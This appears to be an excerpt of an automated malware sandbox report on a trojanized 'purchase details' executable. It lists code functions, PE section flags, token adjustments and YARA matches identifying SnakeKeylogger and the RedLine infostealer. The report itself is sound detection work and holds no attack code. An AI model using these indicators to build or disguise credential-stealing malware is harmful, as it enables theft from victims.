Source: C:\Windows\System32\AppVClient.exe | Code function: 17_2_00B879F0
Source: C:\Windows\System32\AppVClient.exe | Code function: 17_2_00BB2D40
Source: C:\Windows\System32\AppVClient.exe | Code function: 17_2_00BAEEB0
Source: C:\Windows\System32\AppVClient.exe | Code function: 17_2_00BA92A0
Source: C:\Windows\System32\AppVClient.exe | Code function: 17_2_00BA93B0
Source: C:\Users\Public\alpha.pif | Code function: 22_2_00194C10
Source: C:\Users\Public\alpha.pif | Code function: 22_2_0019540A
Source: C:\Users\Public\alpha.pif | Code function: 22_2_001A4875
Source: C:\Users\Public\alpha.pif | Code function: 22_2_001974B1
Source: C:\Users\Public\alpha.pif | Code function: 22_2_001B695A
Source: C:\Users\Public\alpha.pif | Code function: 22_2_00199144
Source: C:\Users\Public\alpha.pif | Code function: 22_2_001B4191
Source: C:\Users\Public\alpha.pif | Code function: 22_2_0019EE03
Source: C:\Users\Public\alpha.pif | Code function: 22_2_00197A34
Source: C:\Users\Public\alpha.pif | Code function: 22_2_00196E57
Source: C:\Users\Public\alpha.pif | Code function: 22_2_0019D660
Source: C:\Users\Public\alpha.pif | Code function: 22_2_001B3E66
Source: C:\Users\Public\alpha.pif | Code function: 22_2_001B769E
Source: C:\Users\Public\alpha.pif | Code function: 22_2_001A5A86
Source: C:\Users\Public\alpha.pif | Code function: 22_2_001A3EB3
Source: C:\Users\Public\alpha.pif | Code function: 22_2_001A4EC1
Source: C:\Users\Public\alpha.pif | Code function: 22_2_00196B20
Source: C:\Users\Public\alpha.pif | Code function: 22_2_001A0740
Source: C:\Users\Public\alpha.pif | Code function: 22_2_001A0BF0
Source: C:\Users\Public\xpha.pif | Code function: 23_2_00771E26
Source: C:\Windows\System32\FXSSVC.exe | Code function: 24_2_0051A810
Source: C:\Windows\System32\FXSSVC.exe | Code function: 24_2_004F7C00
Source: C:\Windows\System32\FXSSVC.exe | Code function: 24_2_00522D40
Source: C:\Windows\System32\FXSSVC.exe | Code function: 24_2_004F79F0
Source: C:\Windows\System32\FXSSVC.exe | Code function: 24_2_0051EEB0
Source: C:\Windows\System32\FXSSVC.exe | Code function: 24_2_005192A0
Source: C:\Windows\System32\FXSSVC.exe | Code function: 24_2_005193B0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 25_2_00897C00
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 25_2_008BA810
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 25_2_008979F0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 25_2_008C2D40
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 25_2_008B92A0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 25_2_008BEEB0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 25_2_008B93B0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Code function: 26_2_00D4A810
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Code function: 26_2_00D27C00
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Code function: 26_2_00D279F0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Code function: 26_2_00D52D40
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Code function: 26_2_00D4EEB0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Code function: 26_2_00D492A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Code function: 26_2_00D493B0
Source: C:\Windows\System32\msdtc.exe | Code function: 27_2_00CD7C00
Source: C:\Windows\System32\msdtc.exe | Code function: 27_2_00CFA810
Source: C:\Windows\System32\msdtc.exe | Code function: 27_2_00CD79F0
Source: C:\Windows\System32\msdtc.exe | Code function: 27_2_00D02D40
Source: C:\Windows\System32\msdtc.exe | Code function: 27_2_00CF92A0
Source: C:\Windows\System32\msdtc.exe | Code function: 27_2_00CFEEB0
Source: C:\Windows\System32\msdtc.exe | Code function: 27_2_00CF93B0
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Code function: 28_2_0077A810
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Code function: 28_2_00757C00
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Code function: 28_2_00782D40
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Code function: 28_2_007579F0
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Code function: 28_2_0077EEB0
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Code function: 28_2_007792A0
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Code function: 28_2_007793B0
Source: C:\Windows\System32\Locator.exe | Code function: 30_2_0056A810
Source: C:\Windows\System32\Locator.exe | Code function: 30_2_00547C00
Source: C:\Windows\System32\Locator.exe | Code function: 30_2_00572D40
Source: C:\Windows\System32\Locator.exe | Code function: 30_2_005479F0
Source: C:\Windows\System32\Locator.exe | Code function: 30_2_0056EEB0
Source: C:\Windows\System32\Locator.exe | Code function: 30_2_005692A0
Source: C:\Windows\System32\Locator.exe | Code function: 30_2_005693B0
Source: C:\Windows\System32\SensorDataService.exe | Code function: 31_2_0075A810
Source: C:\Windows\System32\SensorDataService.exe | Code function: 31_2_00737C00
Source: C:\Windows\System32\SensorDataService.exe | Code function: 31_2_00762D40
Source: C:\Windows\System32\SensorDataService.exe | Code function: 31_2_007379F0
Source: C:\Windows\System32\SensorDataService.exe | Code function: 31_2_0075EEB0
Source: C:\Windows\System32\SensorDataService.exe | Code function: 31_2_007592A0
Source: C:\Windows\System32\SensorDataService.exe | Code function: 31_2_007593B0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Process token adjusted: Load Driver
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Process token adjusted: Security
Source: C:\Users\Public\Libraries\ymafvvdS.pif | Code function: String function: 0040E1D8 appears 43 times
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Code function: String function: 02B146D4 appears 244 times
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Code function: String function: 02B289D0 appears 45 times
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Code function: String function: 02B2894C appears 56 times
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Code function: String function: 02B144DC appears 74 times
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Code function: String function: 02B14500 appears 33 times
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Code function: String function: 02B14860 appears 949 times
Source: chrmstp.exe.9.dr | Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: chrmstp.exe.9.dr | Static PE information: Resource name: RT_STRING type: PDP-11 pure executable not stripped
Source: setup.exe.9.dr | Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: setup.exe.9.dr | Static PE information: Resource name: RT_STRING type: PDP-11 pure executable not stripped
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.dr | Static PE information: Resource name: B7 type: 7-zip archive data, version 0.3
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.dr | Static PE information: Resource name: B7 type: 7-zip archive data, version 0.3
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.dr | Static PE information: Resource name: B7 type: 7-zip archive data, version 0.3
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.dr | Static PE information: Resource name: B7 type: 7-zip archive data, version 0.3
Source: chrome_pwa_launcher.exe.9.dr | Static PE information: Number of sections : 13 > 10
Source: chrome_proxy.exe.9.dr | Static PE information: Number of sections : 12 > 10
Source: setup.exe0.9.dr | Static PE information: Number of sections : 13 > 10
Source: setup.exe.9.dr | Static PE information: Number of sections : 14 > 10
Source: identity_helper.exe.9.dr | Static PE information: Number of sections : 12 > 10
Source: msedgewebview2.exe.9.dr | Static PE information: Number of sections : 14 > 10
Source: elevation_service.exe0.9.dr | Static PE information: Number of sections : 12 > 10
Source: notification_helper.exe.9.dr | Static PE information: Number of sections : 13 > 10
Source: chrmstp.exe.9.dr | Static PE information: Number of sections : 14 > 10
Source: firefox.exe.9.dr | Static PE information: Number of sections : 11 > 10
Source: ie_to_edge_stub.exe.9.dr | Static PE information: Number of sections : 11 > 10
Source: elevation_service.exe.9.dr | Static PE information: Number of sections : 12 > 10
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe | Binary or memory string: OriginalFilename vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1430067996.000000007F9E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1430067996.000000007F9E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1571228970.0000000021D3D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209AA000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209C2000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209C2000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1429814207.0000000002597000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1561847890.0000000021D05000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1429580611.000000007FB90000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1585083858.0000000002596000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1561847890.0000000021D34000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1642838997.000000007FB6F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1429814207.0000000002593000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1634935767.0000000022065000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1585083858.0000000002592000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1571228970.0000000021CDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209E5000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209E5000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1580684456.0000000000B45000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: unknown | Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 9.3.ymafvvdS.pif.24742da8.17.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.3.ymafvvdS.pif.24590000.925.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.1.ymafvvdS.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.3.ymafvvdS.pif.24742da8.17.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.1.ymafvvdS.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000009.00000003.1577655247.0000000024742000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: ymafvvdS.pif PID: 7996, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: MavInject32.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: OfficeC2RClient.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3_x64.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SciTE.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeARMHelper.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jaureg.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jucheck.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jusched.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: officesvcmgr.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_pwa_launcher.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrmstp.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_helper.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_proxy.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: crashreporter.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: default-browser-agent.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: firefox.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler64.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdate.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateBroker.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateComRegisterShell64.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateCore.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateOnDemand.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
